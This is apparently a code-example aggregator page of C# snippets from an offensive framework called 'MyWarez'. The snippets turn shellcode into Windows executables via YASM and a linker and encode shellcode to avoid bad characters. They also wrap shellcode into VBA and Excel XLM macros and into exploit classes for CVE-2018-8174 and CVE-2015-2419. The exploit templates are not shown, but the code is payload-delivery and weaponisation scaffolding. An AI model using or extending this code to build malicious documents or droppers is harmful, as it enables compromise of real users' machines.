private static IEnumerable <AssemblySourceFile <YASM> > CreateSource(IShellcode shellcode, string symbolname, string sectionName = null, bool?sectionWritable = null)
        {
            var sourceFiles       = new List <AssemblySourceFile <YASM> >();
            var shellcodeFilename = Utils.RandomString(10) + ".bin";

            sourceFiles.Add(new AssemblySourceFile <YASM>(shellcode.Bytes, shellcodeFilename));
            string sectionLine;

            if (sectionName == null && !sectionWritable.HasValue)
            {
                sectionLine = "";//SECTION '{1}' {2} execute,read\r\n   //sectionName, sectionWritable ? "write," : ""
            }
            else
            {
                sectionName = sectionName ?? ".text";
                sectionLine = $"SECTION '{sectionName}'";
                if (sectionWritable.HasValue && sectionWritable.Value)
                {
                    sectionLine += " write, execute, read";
                }
                sectionLine += "\r\n";
            }
            var source = $"Global {symbolname}\r\n{sectionLine}{symbolname}:\r\n\tincbin '{shellcodeFilename}'";

            sourceFiles.Add(new AssemblySourceFile <YASM>(source, Utils.RandomString(10) + ".asm"));
            return(sourceFiles);
        }
Esempio n. 2
0
            static Executable ShellcodeToExe(IShellcode shellcode, TargetArch targetArch)
            {
                switch (targetArch)
                {
                case TargetArch.x64:
                {
                    var rawShellcodeAsm = new RawShellcodeYasmAssemblySource(shellcode, symbolName: "SheSellsShellCodesByTheSilkRoad");
                    var staticLibrary   = ((IAssembler <YASM, Win64ObjectFile>) new MyWarez.Plugins.Yasm.Yasm()).Assemble(rawShellcodeAsm);
                    var entryPoint      = ((ICFunction)rawShellcodeAsm).Name;
                    var linkerConfig    = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: entryPoint);
                    return(((ILinker <Win64ObjectFile, Executable>) new MyWarez.Plugins.GoDevTool.Linker(linkerConfig)).Link(staticLibrary));
                }

                case TargetArch.x86:
                {
                    var rawShellcodeAsm = new RawShellcodeYasmAssemblySource(shellcode, symbolName: "SheSellsShellCodesByTheSilkRoad");
                    var staticLibrary   = ((IAssembler <YASM, Win32ObjectFile>) new MyWarez.Plugins.Yasm.Yasm()).Assemble(rawShellcodeAsm);
                    var entryPoint      = ((ICFunction)rawShellcodeAsm).Name;
                    var linkerConfig    = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: entryPoint);
                    var exe             = ((ILinker <Win32ObjectFile, Executable>) new MyWarez.Plugins.GoDevTool.Linker(linkerConfig)).Link(staticLibrary);
                    return(exe);
                }

                default:
                    throw new Exception();
                }
            }
Esempio n. 3
0
        private static byte[] EncodeShellcode(IShellcode shellcode)
        {
            if (!ValidShellcodeArchs.Contains(shellcode.Arch))
            {
                throw new ArgumentException();
            }

            return(Utils.EncodeShellcode(shellcode.Bytes, shellcode.Arch, BadChars));
        }
 public RawShellcodeYasmAssemblySource(IShellcode shellcode, string symbolName, string sectionName = null, bool?sectionWritable = null)
     : base(CreateSource(shellcode, symbolName, sectionName, sectionWritable))
 {
     SymbolName = symbolName;
 }
Esempio n. 5
0
 // Note: payload might execute twice
 public CVE_2018_8174(IShellcode shellcode) : base(string.Format(Template, Utils.TransformShellcode(shellcode.Bytes, shellcode.Arch, "js_le")))
 {
 }
Esempio n. 6
0
 public ShellcodeVbaMacro(IShellcode shellcode)
 {
     Shellcode = shellcode;
 }
Esempio n. 7
0
 // Note: payload might fire twice
 // IE Exploit (CVE-2015-2419)
 public CVE_2015_2419(IShellcode shellcode) : base(string.Format(Template, Utils.BytesToJavaScriptArray(shellcode.Bytes)))
 {
 }
Esempio n. 8
0
 public ShellcodeXlmMacro(IShellcode shellcode) : base(ShellCodeToCellMatrix(EncodeShellcode(shellcode)), macroEnabled: true)
 {
 }